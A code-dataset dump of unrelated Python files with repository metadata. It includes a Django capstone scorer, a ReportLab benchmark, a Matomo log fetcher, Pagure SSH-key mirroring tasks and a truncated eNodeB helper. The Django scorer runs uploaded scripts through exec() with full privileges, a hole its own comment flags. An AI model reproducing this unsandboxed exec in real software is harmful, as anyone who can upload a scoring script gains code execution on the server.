logger = logging.getLogger(__name__)
class Capstone(models.Model):
    """A capstone project with an optional uploaded scoring script."""

    # Human-readable capstone name.
    name = models.CharField(max_length=1024)
    # Python source file expected to define a score(capstone, api) function.
    scoring = models.FileField(upload_to=random_path, null=True, blank=True)

    def __str__(self):
        return self.name

    def score(self):
        """Run the uploaded scoring script against every StudentApi and persist scores.

        SECURITY NOTE(review): exec() runs the uploaded file with full
        process privileges — only trusted staff should be able to upload
        `scoring` scripts; confirm upload permissions elsewhere.
        """
        # Load scoring
        glob = {}
        script = self.scoring.read().decode()
        exec(script, glob)
        for api in self.studentapi_set.all():
            # noinspection PyUnresolvedReferences,PyUnboundLocalVariable
            score = glob["score"](self, api)
            api.score = score
            api.save()
class StudentApi(models.Model):
    """A student's deployed API endpoint for a capstone, with its latest score."""

    capstone = models.ForeignKey(Capstone, models.CASCADE)
    user = models.ForeignKey(User, models.CASCADE)
    # Base URL of the student's service; empty means not yet deployed.
    url = models.CharField(max_length=255, blank=True)
    # Last score computed by Capstone.score().
    score = models.FloatField(default=0)
class Simulator(models.Model):
    """Replays a capstone's datapoints against student APIs on a fixed schedule."""

    capstone = models.ForeignKey(
        Capstone, models.CASCADE, related_name="simulators"
    )
    name = models.CharField(max_length=1024)
    # Set when the simulator actually starts; None until then.
    started = models.DateTimeField(null=True)
    ends = models.DateTimeField(null=True)
    # Time between consecutive datapoints, computed at start time.
    interval = models.DurationField(null=True)
    # example: predict
    path = models.CharField(max_length=255)
    STATUS_CHOICES = (
        ("stopped", "stopped"),
        ("start", "start"),
        ("started", "started"),
        ("paused", "paused"),
        ("reset", "reset"),
        ("ended", "ended"),
    )
    # BUG FIX: the previous default "queued" was not one of STATUS_CHOICES;
    # "stopped" is the inert initial state.
    status = models.CharField(
        choices=STATUS_CHOICES, default="stopped", max_length=64
    )

    def start(self):
        """Transition from 'start' (set via the admin) to 'started' and queue work."""
        if self.status == "start":  # Started manually through the admin
            logger.info("Starting simulator: %s", self)
            now = datetime.now(timezone.utc)
            self.started = now
            self.status = "started"
            self.save()
            self.create_due_datapoints(now)

    def create_due_datapoints(self, starts):
        """Recreate DueDatapoints evenly spread between `starts` and self.ends.

        Raises RuntimeError when the producer cannot queue requests fast
        enough for the computed per-datapoint interval.
        """
        logger.info("Creating due datapoints for %s", self)
        self.due_datapoints.all().delete()
        datapoints = self.datapoints.order_by("id").all()
        student_apis = StudentApi.objects.filter(
            capstone=self.capstone
        ).exclude(url="")
        interval = (self.ends - starts) / datapoints.count()
        # Assuming one producer we are queueing BLOCK_SIZE requests per cycle
        # to queue enough requests we need to queue at least
        # (PRODUCER_INTERVAL / interval) * number of students
        required_requests_per_cycle = student_apis.count() * (
            settings.PRODUCER_INTERVAL / interval.total_seconds()
        )
        logger.debug("Block size: %s", settings.BLOCK_SIZE)
        logger.debug("Required requests: %s", required_requests_per_cycle)
        if settings.BLOCK_SIZE < required_requests_per_cycle:
            raise RuntimeError(
                f"Number of queued requests per cycle is not enough, "
                f"required {required_requests_per_cycle}",
                f"consumed {settings.BLOCK_SIZE}",
            )
        self.interval = interval
        self.save()
        for student_api in student_apis:
            self.add_student_api(student_api, datapoints, starts)

    def add_student_api(self, student_api, datapoints, starts=None):
        """Queue one DueDatapoint per datapoint for a single student API.

        When `starts` is None (a student added after the simulator started)
        scheduling begins now.
        """
        logger.info(
            "Creating due datapoints for simulator %s student %s",
            self,
            # BUG FIX: StudentApi has a `user` field, not `student`.
            student_api.user,
        )
        due = starts or datetime.now(timezone.utc)
        # BUG FIX: previously divided by `starts`, which raises TypeError
        # when this is called without it; use the effective start time.
        interval = (self.ends - due) / datapoints.count()
        logger.debug("Starting: %s", due)
        logger.debug("Ending: %s", self.ends)
        logger.debug("Count: %s", datapoints.count())
        logger.debug("Interval: %s", interval)
        url = urljoin(student_api.url, self.path)
        due_datapoints = []
        for datapoint in datapoints:
            due_datapoints.append(
                DueDatapoint(
                    simulator=self,
                    datapoint=datapoint,
                    # BUG FIX: see above — the FK field is `user`.
                    user=student_api.user,
                    due=due,
                    url=url,
                )
            )
            due += interval
        DueDatapoint.objects.bulk_create(due_datapoints)

    def __str__(self):
        return self.name

    def reset(self):
        """Delete queued datapoints and return to 'stopped' when status is 'reset'."""
        if self.status == "reset":
            logger.info("Resetting simulator %s", self)
            self.due_datapoints.all().delete()
            self.status = "stopped"
            self.save()
class Datapoint(models.Model):
    """A single input/expected-outcome pair belonging to a simulator."""

    simulator = models.ForeignKey(
        Simulator, models.CASCADE, related_name="datapoints"
    )
    # Serialized payload sent to the student API.
    data = models.TextField(blank=True)
    # Expected / ground-truth outcome for scoring.
    outcome = models.TextField(blank=True)
class DueDatapoint(models.Model):
    """A scheduled delivery of one Datapoint to one student's API, plus the response."""

    simulator = models.ForeignKey(
        Simulator, models.CASCADE, related_name="due_datapoints"
    )
    # Fully resolved endpoint URL (student base URL + simulator path).
    url = models.TextField()
    datapoint = models.ForeignKey(Datapoint, models.CASCADE)
    user = models.ForeignKey(User, models.CASCADE)
    # When this datapoint is scheduled to be sent.
    due = models.DateTimeField(null=True)
    STATE_CHOICES = (
        ("due", "due"),
        ("queued", "queued"),
        ("success", "success"),
        ("fail", "fail"),
    )
    state = models.CharField(
        choices=STATE_CHOICES, default="due", max_length=64
    )
    # Outcome of the HTTP call, recorded by the consumer.
    response_content = models.TextField(blank=True)
    response_exception = models.TextField(blank=True)
    response_traceback = models.TextField(blank=True)
    # Elapsed seconds of the request, if it completed.
    response_elapsed = models.FloatField(null=True)
    response_status = models.IntegerField(null=True)
    response_timeout = models.BooleanField(default=False)
| 31.922652
| 77
| 0.624264
|
4a07ccdffe18e08c8f4b3b3a5a5949c3f078e928
| 4,323
|
py
|
Python
|
demos/odyssey/odyssey.py
|
sbluen/reportlab
|
98758940eeae30db80bbc9c555e42b8c89b86be8
|
[
"BSD-3-Clause"
] | 8
|
2018-11-01T10:40:18.000Z
|
2021-12-16T03:20:48.000Z
|
demos/odyssey/odyssey.py
|
sbluen/reportlab
|
98758940eeae30db80bbc9c555e42b8c89b86be8
|
[
"BSD-3-Clause"
] | 2
|
2015-03-16T18:32:58.000Z
|
2019-03-20T07:17:04.000Z
|
demos/odyssey/odyssey.py
|
sbluen/reportlab
|
98758940eeae30db80bbc9c555e42b8c89b86be8
|
[
"BSD-3-Clause"
] | 26
|
2015-03-16T18:27:04.000Z
|
2022-03-25T10:08:33.000Z
|
#Copyright ReportLab Europe Ltd. 2000-2012
#see license.txt for license details
__version__=''' $Id$ '''
___doc__=''
#odyssey.py
#
#Demo/benchmark of PDFgen rendering Homer's Odyssey.
#results on my humble P266 with 64MB:
# Without page compression:
# 239 pages in 3.76 seconds = 77 pages per second
# With textOut rather than textLine, i.e. computing width
# of every word as we would for wrapping:
# 239 pages in 10.83 seconds = 22 pages per second
# With page compression and textLine():
# 239 pages in 39.39 seconds = 6 pages per second
from reportlab.pdfgen import canvas
import time, os, sys
#find out what platform we are on and whether accelerator is
#present, in order to print this as part of benchmark info.
try:
    import _rl_accel
    ACCEL = 1
except ImportError:
    ACCEL = 0
from reportlab.lib.units import inch, cm
from reportlab.lib.pagesizes import A4
#precalculate some basics
# Page frame geometry: one-inch margins on an A4 page.
top_margin = A4[1] - inch
bottom_margin = inch
left_margin = inch
right_margin = A4[0] - inch
frame_width = right_margin - left_margin
def drawPageFrame(canv):
    """Draw the recurring page furniture: top rule with running title,
    bottom rule, and a centred page number."""
    canv.line(left_margin, top_margin, right_margin, top_margin)
    canv.setFont('Times-Italic',12)
    canv.drawString(left_margin, top_margin + 2, "Homer's Odyssey")
    # BUG FIX: the top rule was previously drawn a second time here;
    # drawing it once is sufficient.
    canv.line(left_margin, bottom_margin, right_margin, bottom_margin)
    canv.drawCentredString(0.5*A4[0], 0.5 * inch,
                           "Page %d" % canv.getPageNumber())
def run(verbose=1):
    """Render the full Odyssey text to odyssey.pdf and print throughput stats.

    NOTE: this file is Python 2 code (print statements, md5 module).
    """
    # Report interpreter flavour/version and accelerator availability.
    if sys.platform[0:4] == 'java':
        impl = 'Jython'
    else:
        impl = 'Python'
    verStr = '%d.%d' % (sys.version_info[0:2])
    if ACCEL:
        accelStr = 'with _rl_accel'
    else:
        accelStr = 'without _rl_accel'
    print 'Benchmark of %s %s %s' % (impl, verStr, accelStr)
    started = time.time()
    # invariant=1 makes output deterministic so the md5 digest is comparable.
    canv = canvas.Canvas('odyssey.pdf', invariant=1)
    canv.setPageCompression(1)
    drawPageFrame(canv)
    #do some title page stuff
    canv.setFont("Times-Bold", 36)
    canv.drawCentredString(0.5 * A4[0], 7 * inch, "Homer's Odyssey")
    canv.setFont("Times-Bold", 18)
    canv.drawCentredString(0.5 * A4[0], 5 * inch, "Translated by Samuel Burton")
    canv.setFont("Times-Bold", 12)
    tx = canv.beginText(left_margin, 3 * inch)
    tx.textLine("This is a demo-cum-benchmark for PDFgen. It renders the complete text of Homer's Odyssey")
    tx.textLine("from a text file. On my humble P266, it does 77 pages per secondwhile creating a 238 page")
    tx.textLine("document. If it is asked to computer text metrics, measuring the width of each word as ")
    tx.textLine("one would for paragraph wrapping, it still manages 22 pages per second.")
    tx.textLine("")
    tx.textLine("Andy Robinson, Robinson Analytics Ltd.")
    canv.drawText(tx)
    canv.showPage()
    #on with the text...
    drawPageFrame(canv)
    canv.setFont('Times-Roman', 12)
    tx = canv.beginText(left_margin, top_margin - 0.5*inch)
    # Prefer the full text if present, else the shorter sample.
    for fn in ('odyssey.full.txt','odyssey.txt'):
        if os.path.isfile(fn):
            break
    data = open(fn,'r').readlines()
    for line in data:
        #this just does it the fast way...
        tx.textLine(line.rstrip())
        #page breaking
        y = tx.getY()   #get y coordinate
        if y < bottom_margin + 0.5*inch:
            canv.drawText(tx)
            canv.showPage()
            drawPageFrame(canv)
            canv.setFont('Times-Roman', 12)
            tx = canv.beginText(left_margin, top_margin - 0.5*inch)
            #page
            pg = canv.getPageNumber()
            if verbose and pg % 10 == 0:
                print 'formatted page %d' % canv.getPageNumber()
    # Flush the final partial page.
    if tx:
        canv.drawText(tx)
        canv.showPage()
        drawPageFrame(canv)
    if verbose:
        print 'about to write to disk...'
    canv.save()
    finished = time.time()
    elapsed = finished - started
    pages = canv.getPageNumber()-1
    speed = pages / elapsed
    fileSize = os.stat('odyssey.pdf')[6] / 1024
    print '%d pages in %0.2f seconds = %0.2f pages per second, file size %d kb' % (
        pages, elapsed, speed, fileSize)
    import md5
    print 'file digest: %s' % md5.md5(open('odyssey.pdf','rb').read()).hexdigest()
if __name__=='__main__':
    # -q suppresses per-page progress output.
    quiet = ('-q' in sys.argv)
    run(verbose = not quiet)
| 29.408163
| 109
| 0.647698
|
4a07cd41ba079b24efc37fcd542877b1a58c8803
| 3,977
|
py
|
Python
|
fetch_missing_matomo_requests.py
|
alphagov/verify-matomo-tool
|
b3461f56c38ec4c004b3d3c73d26b986154136ac
|
[
"MIT"
] | 1
|
2019-10-22T11:29:31.000Z
|
2019-10-22T11:29:31.000Z
|
fetch_missing_matomo_requests.py
|
alphagov/verify-matomo-tool
|
b3461f56c38ec4c004b3d3c73d26b986154136ac
|
[
"MIT"
] | 1
|
2021-06-01T23:49:20.000Z
|
2021-06-01T23:49:20.000Z
|
fetch_missing_matomo_requests.py
|
alphagov/verify-matomo-tool
|
b3461f56c38ec4c004b3d3c73d26b986154136ac
|
[
"MIT"
] | 2
|
2019-08-29T14:01:57.000Z
|
2021-04-10T19:34:26.000Z
|
from datetime import datetime, timedelta, timezone
import os
import boto3
import time
from _decimal import Decimal
# Names of the environment variables this script reads.
NUM_OF_DAYS = 'NUM_OF_DAYS'
START_DATE = 'START_DATE'
def print_unset_env_variable_error_and_exit(environment_variable):
    """Report an unset environment variable on stdout and exit with status 1."""
    parts = (environment_variable, " environment variable is not set.")
    print(*parts)
    exit(1)
def validate_environment_variables():
    """Exit with an error message if START_DATE or NUM_OF_DAYS is unset."""
    for variable in (START_DATE, NUM_OF_DAYS):
        if os.getenv(variable) is None:
            print_unset_env_variable_error_and_exit(variable)
def get_start_date():
    """Parse the START_DATE env var (%Y-%m-%dT%H:%M:%S%z); exit(1) on bad format."""
    raw_value = os.getenv(START_DATE)
    try:
        return datetime.strptime(raw_value, '%Y-%m-%dT%H:%M:%S%z')
    except ValueError:
        print("START_DATE has an invalid date and time format. It should be in %Y-%m-%dT%H:%M:%S%z")
        exit(1)
def get_number_of_days():
    """Return the NUM_OF_DAYS env var as an int; exit(1) on a non-integer value."""
    raw_value = os.getenv(NUM_OF_DAYS)
    try:
        return int(raw_value)
    except ValueError:
        print("NUM_OF_DAYS has an invalid format. It should be in integers only")
        exit(1)
def wait_for_the_query_to_complete(response):
    """Poll the logs query from `response` once per second until it is 'Complete'.

    Returns the final get_query_results payload. Uses the module-level
    boto3 `client`.
    """
    query_id = response['queryId']
    result = response
    status = 'Running'
    while status != 'Complete':
        result = client.get_query_results(queryId=query_id)
        status = result['status']
        time.sleep(1)
    return result
def run_query(start_timestamp, end_timestamp):
    """Start a CloudWatch Logs Insights query for failed matomo tracking requests.

    Timestamps are datetime objects; they are converted to epoch
    milliseconds as required by start_query. Uses the module-level
    boto3 `client`.
    """
    query_string = """fields @message
        | sort @timestamp asc
        | filter @logStream like /matomo-nginx/
        | filter status!='200'
        | filter status!='204'
        | filter user_agent!='ELB-HealthChecker/2.0'
        | filter path like /idsite=1/
        | filter path like /rec=1/"""
    start_ms = int(start_timestamp.timestamp() * 1000)
    end_ms = int(end_timestamp.timestamp() * 1000)
    return client.start_query(
        logGroupName='matomo',
        startTime=start_ms,
        endTime=end_ms,
        queryString=query_string,
        limit=10000,
    )
def write_requests_to_a_file(response, start_date, end_date, output_filename):
    """Append the first '@message' value of each result row to output_filename.

    start_date and end_date are accepted for call-site symmetry but are
    not used here.
    """
    with open(output_filename, 'a+') as out:
        for fields in response['results']:
            messages = (
                field['value'] for field in fields
                if field['field'] == '@message'
            )
            first_message = next(messages, None)
            if first_message is not None:
                out.write(first_message + '\n')
if __name__ == '__main__':
    # Fetch missed matomo tracking requests from CloudWatch Logs, day by day,
    # in 5-minute query windows (to stay under the 10k-results-per-query cap),
    # appending all '@message' lines to one output file.
    validate_environment_variables()
    client = boto3.client('logs')
    start_date = get_start_date()
    num_of_days = get_number_of_days()
    end_date = start_date + timedelta(days=num_of_days) + timedelta(microseconds=-1)
    # e.g. 20200101_20200107_matomo_requests.json
    OUTPUT_FILENAME = start_date.strftime('%Y%m%d') + '_' + end_date.strftime('%Y%m%d') + '_matomo_requests.json'
    # Start fresh: the writer appends, so remove any previous run's file.
    if os.path.exists(OUTPUT_FILENAME):
        os.remove(OUTPUT_FILENAME)
    for days in range(0, get_number_of_days()):
        current_date = start_date + timedelta(days=(days))
        end_date = current_date + timedelta(days=1, microseconds=-1)
        start_timestamp = current_date.replace(tzinfo=timezone.utc).timestamp()
        end_timestamp = end_date.replace(tzinfo=timezone.utc).timestamp()
        duration = (end_date - current_date).total_seconds()
        # Query window size: 5 minutes.
        offset = 60 * 5
        num_of_iterations = int(duration / offset)
        for i in range(num_of_iterations):
            response = run_query(datetime.utcfromtimestamp(start_timestamp),
                                 (datetime.utcfromtimestamp((start_timestamp + offset)) + timedelta(microseconds=-1)))
            response = wait_for_the_query_to_complete(response)
            write_requests_to_a_file(response, start_date, end_date, OUTPUT_FILENAME)
            start_timestamp = start_timestamp + offset
        # If the day doesn't divide evenly into 5-minute windows, run one
        # final query for the leftover remainder.
        if Decimal(duration) / Decimal(offset) % Decimal(1) != Decimal(0):
            response = run_query(datetime.utcfromtimestamp(start_timestamp),
                                 (datetime.utcfromtimestamp((start_timestamp + offset)) + timedelta(microseconds=-1)))
            response = wait_for_the_query_to_complete(response)
            write_requests_to_a_file(response, start_date, end_date, OUTPUT_FILENAME)
| 35.828829
| 118
| 0.665829
|
4a07cdabb48f3e641cbfa7a14b9a8d8c7a9719b8
| 574
|
py
|
Python
|
2021-04-Python-SEA-ENGRSL-Workshops/Workshop_1-Python-for-Automation/s06a_Activity.py
|
shawnduong/manimations
|
1d36d9d1e7dff90a1a8da1e687ef442f750e29c5
|
[
"MIT"
] | null | null | null |
2021-04-Python-SEA-ENGRSL-Workshops/Workshop_1-Python-for-Automation/s06a_Activity.py
|
shawnduong/manimations
|
1d36d9d1e7dff90a1a8da1e687ef442f750e29c5
|
[
"MIT"
] | null | null | null |
2021-04-Python-SEA-ENGRSL-Workshops/Workshop_1-Python-for-Automation/s06a_Activity.py
|
shawnduong/manimations
|
1d36d9d1e7dff90a1a8da1e687ef442f750e29c5
|
[
"MIT"
] | null | null | null |
from manim import *
class s06a_Activity(Scene):
    """Title card announcing the hands-on activity, then fade everything out."""

    def construct(self):
        title = Text("Activity: Automate Work Tasks")
        line_one = Text("Prepare to split into groups").scale(0.75)
        line_two = Text("and gain hands-on experience!").scale(0.75)

        # Stack the three lines vertically, title slightly above centre.
        title.shift(0.25*UP)
        line_one.next_to(title, DOWN)
        line_two.next_to(line_one, DOWN)

        self.play(Write(title))
        self.wait(1)
        self.play(Write(line_one))
        self.play(Write(line_two))
        self.wait(3)

        # Fade every mobject out together.
        self.play(*[FadeOut(mobject) for mobject in (title, line_one, line_two)])
| 22.96
| 63
| 0.71777
|
4a07cec93de9105014339fe3755d5dc199389df5
| 183
|
py
|
Python
|
library/demo/main.py
|
park-sungmoo/jquery.flowchart_ultide
|
873b1b00caf832b67f9261d076ec71e61a64c513
|
[
"MIT"
] | 81
|
2016-09-11T22:45:27.000Z
|
2022-02-22T15:12:21.000Z
|
library/tcl_procs/main.py
|
Cupidazul/ultide
|
6eac864540e19b23f30bd387310d09b84a3b1cf4
|
[
"MIT"
] | 2
|
2019-01-26T20:39:14.000Z
|
2020-08-01T13:14:19.000Z
|
library/tcl_procs/main.py
|
Cupidazul/ultide
|
6eac864540e19b23f30bd387310d09b84a3b1cf4
|
[
"MIT"
] | 34
|
2016-12-25T12:23:51.000Z
|
2021-06-11T10:12:57.000Z
|
import time
def on_demo_ping(data, response, session_data):
    """Handle a demo ping: echo the message back with the server time.

    Mutates `response` in place by setting its 'demo_response' key.
    """
    echoed = data['message']
    response['demo_response'] = f'Your message was "{echoed}". Time on server is: {time.time()}.'
| 45.75
| 122
| 0.655738
|
4a07cf2ed5de7eafb72da8c71569cb044f80ae51
| 8,431
|
py
|
Python
|
src/pagure/lib/tasks_mirror.py
|
yifengyou/learn-pagure
|
e54ba955368918c92ad2be6347b53bb2c24a228c
|
[
"Unlicense"
] | null | null | null |
src/pagure/lib/tasks_mirror.py
|
yifengyou/learn-pagure
|
e54ba955368918c92ad2be6347b53bb2c24a228c
|
[
"Unlicense"
] | null | null | null |
src/pagure/lib/tasks_mirror.py
|
yifengyou/learn-pagure
|
e54ba955368918c92ad2be6347b53bb2c24a228c
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
(c) 2018 - Copyright Red Hat Inc
Authors:
Pierre-Yves Chibon <pingou@pingoured.fr>
"""
from __future__ import unicode_literals, absolute_import
import base64
import datetime
import logging
import os
import stat
import struct
import six
import werkzeug.utils
from celery import Celery
from cryptography import utils
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
import pagure.lib.query
from pagure.config import config as pagure_config
from pagure.lib.tasks_utils import pagure_task
from pagure.utils import ssh_urlpattern
# logging.config.dictConfig(pagure_config.get('LOGGING') or {'version': 1})
_log = logging.getLogger(__name__)
if os.environ.get("PAGURE_BROKER_URL"): # pragma: no-cover
broker_url = os.environ["PAGURE_BROKER_URL"]
elif pagure_config.get("BROKER_URL"):
broker_url = pagure_config["BROKER_URL"]
else:
broker_url = "redis://%s" % pagure_config["REDIS_HOST"]
conn = Celery("tasks_mirror", broker=broker_url, backend=broker_url)
conn.conf.update(pagure_config["CELERY_CONFIG"])
# Code from:
# https://github.com/pyca/cryptography/blob/6b08aba7f1eb296461528328a3c9871fa7594fc4/src/cryptography/hazmat/primitives/serialization.py#L161
# Taken from upstream cryptography since the version we have is too old
# and doesn't have this code (yet)
def _ssh_write_string(data):
return struct.pack(">I", len(data)) + data
def _ssh_write_mpint(value):
    """Encode integer *value* as an SSH wire-format mpint.

    A leading zero byte is prepended when the high bit is set, so the
    number is not misread as negative.
    """
    encoded = utils.int_to_bytes(value)
    high_bit_set = six.indexbytes(encoded, 0) & 0x80
    if high_bit_set:
        encoded = b"\x00" + encoded
    return _ssh_write_string(encoded)
# Code from _openssh_public_key_bytes at:
# https://github.com/pyca/cryptography/tree/6b08aba7f1eb296461528328a3c9871fa7594fc4/src/cryptography/hazmat/backends/openssl#L1616
# Taken from upstream cryptography since the version we have is too old
# and doesn't have this code (yet)
def _serialize_public_ssh_key(key):
    """Serialize an RSA public key into OpenSSH 'ssh-rsa ...' format.

    Returns None for any non-RSA key, since only RSA keys are written here.
    """
    if not isinstance(key, rsa.RSAPublicKey):
        # Since we only write RSA keys, drop the other serializations
        return None
    numbers = key.public_numbers()
    payload = (
        _ssh_write_string(b"ssh-rsa")
        + _ssh_write_mpint(numbers.e)
        + _ssh_write_mpint(numbers.n)
    )
    return b"ssh-rsa " + base64.b64encode(payload)
def _create_ssh_key(keyfile):
    """Create the public and private ssh keys.

    The specified file name will be the private key and the public one will
    be in a similar file name ending with a '.pub'.
    """
    # 4096-bit RSA with the conventional public exponent 65537.
    private_key = rsa.generate_private_key(
        public_exponent=65537, key_size=4096, backend=default_backend()
    )
    # Serialize the private key unencrypted, in traditional OpenSSL PEM form.
    private_pem = private_key.private_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PrivateFormat.TraditionalOpenSSL,
        encryption_algorithm=serialization.NoEncryption(),
    )
    # O_CREAT | O_EXCL makes creation fail if the file already exists, and
    # mode 0600 keeps the private key readable by the owner only.
    with os.fdopen(
        os.open(keyfile, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600), "wb"
    ) as stream:
        stream.write(private_pem)
    # Write the matching OpenSSH-format public key next to it; skipped when
    # the key type could not be serialized (only RSA is handled).
    public_key = private_key.public_key()
    public_pem = _serialize_public_ssh_key(public_key)
    if public_pem:
        with open(keyfile + ".pub", "wb") as stream:
            stream.write(public_pem)
@conn.task(queue=pagure_config["MIRRORING_QUEUE"], bind=True)
@pagure_task
def setup_mirroring(self, session, username, namespace, name):
    """Setup the specified project for mirroring.

    Generates a dedicated SSH key pair for the project and stores the
    public key in the project's mirror hook in the database.

    Raises pagure.exceptions.PagureException if the SSH key folder is a
    symlink, has permissions other than 0700, is not owned by the user and
    group running this task, or if a key already exists for the project.
    """
    plugin = pagure.lib.plugins.get_plugin("Mirroring")
    plugin.db_object()
    project = pagure.lib.query._get_project(
        session, namespace=namespace, name=name, user=username
    )
    # The project fullname may contain '/'; sanitize it into a safe filename.
    public_key_name = werkzeug.utils.secure_filename(project.fullname)
    ssh_folder = pagure_config["MIRROR_SSHKEYS_FOLDER"]
    if not os.path.exists(ssh_folder):
        os.makedirs(ssh_folder, mode=0o700)
    else:
        # The folder holds private keys: refuse symlinks, loose permissions
        # or foreign ownership rather than risk exposing key material.
        if os.path.islink(ssh_folder):
            raise pagure.exceptions.PagureException("SSH folder is a link")
        folder_stat = os.stat(ssh_folder)
        filemode = stat.S_IMODE(folder_stat.st_mode)
        if filemode != int("0700", 8):
            raise pagure.exceptions.PagureException(
                "SSH folder had invalid permissions"
            )
        if (
            folder_stat.st_uid != os.getuid()
            or folder_stat.st_gid != os.getgid()
        ):
            raise pagure.exceptions.PagureException(
                "SSH folder does not belong to the user or group running "
                "this task"
            )
    public_key_file = os.path.join(ssh_folder, "%s.pub" % public_key_name)
    _log.info("Public key of interest: %s", public_key_file)
    if os.path.exists(public_key_file):
        raise pagure.exceptions.PagureException("SSH key already exists")
    _log.info("Creating public key")
    _create_ssh_key(os.path.join(ssh_folder, public_key_name))
    with open(public_key_file) as stream:
        public_key = stream.read()
    # Only touch the DB when the stored key actually changed.
    if project.mirror_hook.public_key != public_key:
        _log.info("Updating information in the DB")
        project.mirror_hook.public_key = public_key
        session.add(project.mirror_hook)
        session.commit()
@conn.task(queue=pagure_config["MIRRORING_QUEUE"], bind=True)
@pagure_task
def teardown_mirroring(self, session, username, namespace, name):
    """Stop the mirroring of the specified project.

    Deletes the project's SSH key pair from disk and clears the public key
    stored in the project's mirror hook.
    """
    plugin = pagure.lib.plugins.get_plugin("Mirroring")
    plugin.db_object()
    project = pagure.lib.query._get_project(
        session, namespace=namespace, name=name, user=username
    )
    keys_dir = pagure_config["MIRROR_SSHKEYS_FOLDER"]
    key_name = werkzeug.utils.secure_filename(project.fullname)
    # Remove both the private key and its '.pub' counterpart, if present.
    key_paths = (
        os.path.join(keys_dir, key_name),
        os.path.join(keys_dir, "%s.pub" % key_name),
    )
    for path in key_paths:
        if os.path.exists(path):
            os.unlink(path)
    project.mirror_hook.public_key = None
    session.add(project.mirror_hook)
    session.commit()
@conn.task(queue=pagure_config["MIRRORING_QUEUE"], bind=True)
@pagure_task
def mirror_project(self, session, username, namespace, name):
    """Does the actual mirroring of the specified project.

    Runs ``git push --mirror`` to every valid SSH remote configured in the
    project's mirror hook, using the per-project private key created by
    ``setup_mirroring``, and stores the combined push output in the mirror
    hook's ``last_log``. Bails out (with a warning) when the git folder or
    the private key is missing.
    """
    plugin = pagure.lib.plugins.get_plugin("Mirroring")
    plugin.db_object()
    project = pagure.lib.query._get_project(
        session, namespace=namespace, name=name, user=username
    )
    repofolder = pagure_config["GIT_FOLDER"]
    repopath = os.path.join(repofolder, project.path)
    if not os.path.exists(repopath):
        _log.warning("Git folder not found at: %s, bailing", repopath)
        return
    ssh_folder = pagure_config["MIRROR_SSHKEYS_FOLDER"]
    public_key_name = werkzeug.utils.secure_filename(project.fullname)
    private_key_file = os.path.join(ssh_folder, public_key_name)
    if not os.path.exists(private_key_file):
        # Record the failure in the hook log so it is visible in the UI.
        _log.warning("No %s key found, bailing", private_key_file)
        project.mirror_hook.last_log = "Private key not found on disk, bailing"
        session.add(project.mirror_hook)
        session.commit()
        return
    # Add the utility script allowing this feature to work on old(er) git.
    here = os.path.join(os.path.dirname(os.path.abspath(__file__)))
    script_file = os.path.join(here, "ssh_script.sh")
    # Get the list of remotes, keeping only non-empty SSH URLs.
    remotes = [
        remote.strip()
        for remote in project.mirror_hook.target.split("\n")
        if project.mirror_hook
        and remote.strip()
        and ssh_urlpattern.match(remote.strip())
    ]
    # Push to each remote, collecting the output for the hook's log.
    logs = []
    for remote in remotes:
        _log.info(
            "Pushing to remote %s using key: %s", remote, private_key_file
        )
        # GIT_SSH points at the helper script that injects the SSHKEY.
        (stdout, stderr) = pagure.lib.git.read_git_lines(
            ["push", "--mirror", remote],
            abspath=repopath,
            error=True,
            env={"SSHKEY": private_key_file, "GIT_SSH": script_file},
        )
        log = "Output from the push (%s):\n stdout: %s\n stderr: %s" % (
            datetime.datetime.utcnow().isoformat(),
            stdout,
            stderr,
        )
        logs.append(log)
    if logs:
        project.mirror_hook.last_log = "\n".join(logs)
        session.add(project.mirror_hook)
        session.commit()
        _log.info("\n".join(logs))
| 33.062745
| 141
| 0.689717
|
4a07cf31d0d44829ed4d57c80790ad3980cdbc25
| 3,980
|
py
|
Python
|
lte/gateway/python/magma/enodebd/devices/device_utils.py
|
rdefosse/magma
|
d12ac827d0cdb39f499ce202e9e1196cc50b68d7
|
[
"BSD-3-Clause"
] | 1
|
2021-11-03T21:37:26.000Z
|
2021-11-03T21:37:26.000Z
|
lte/gateway/python/magma/enodebd/devices/device_utils.py
|
rdefosse/magma
|
d12ac827d0cdb39f499ce202e9e1196cc50b68d7
|
[
"BSD-3-Clause"
] | 36
|
2020-08-06T21:08:00.000Z
|
2021-05-21T05:51:23.000Z
|
lte/gateway/python/magma/enodebd/devices/device_utils.py
|
rdefosse/magma
|
d12ac827d0cdb39f499ce202e9e1196cc50b68d7
|
[
"BSD-3-Clause"
] | 1
|
2021-07-12T09:37:07.000Z
|
2021-07-12T09:37:07.000Z
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import re
from magma.enodebd.exceptions import UnrecognizedEnodebError
from magma.enodebd.logger import EnodebdLogger as logger
class EnodebDeviceName():
    """
    This exists only to break a circular dependency. Otherwise there's no
    point of having these names for the devices
    """
    # These constants are the values returned by get_device_name() below to
    # identify the data model for each vendor/firmware combination.
    BAICELLS = 'Baicells'
    BAICELLS_OLD = 'Baicells Old'
    BAICELLS_QAFA = 'Baicells QAFA'
    BAICELLS_QAFB = 'Baicells QAFB'
    BAICELLS_RTS = 'Baicells RTS'
    CAVIUM = 'Cavium'
def get_device_name(
    device_oui: str,
    sw_version: str,
) -> str:
    """
    Use the manufacturer organization unique identifier read during INFORM
    to select the TR data model used for configuration and status reports

    Qualcomm-based Baicells eNodeBs use a TR098-based model different
    from the Intel units. The software version on the Qualcomm models
    also further limits the model usable by that device.

    Args:
        device_oui: string, OUI representing device vendor
        sw_version: string, firmware version of eNodeB device

    Returns:
        DataModel

    Raises:
        UnrecognizedEnodebError: for an unknown OUI, or a Baicells OUI
            with an unrecognized firmware version prefix.
    """
    baicells_ouis = {'34ED0B', '48BF74'}
    cavium_ouis = {'000FB7', '744D28'}

    if device_oui in cavium_ouis:
        return EnodebDeviceName.CAVIUM
    if device_oui not in baicells_ouis:
        raise UnrecognizedEnodebError("Device %s unsupported" % device_oui)

    # Baicells: the firmware prefix determines the data model.
    if sw_version.startswith('BaiBS_QAFB'):
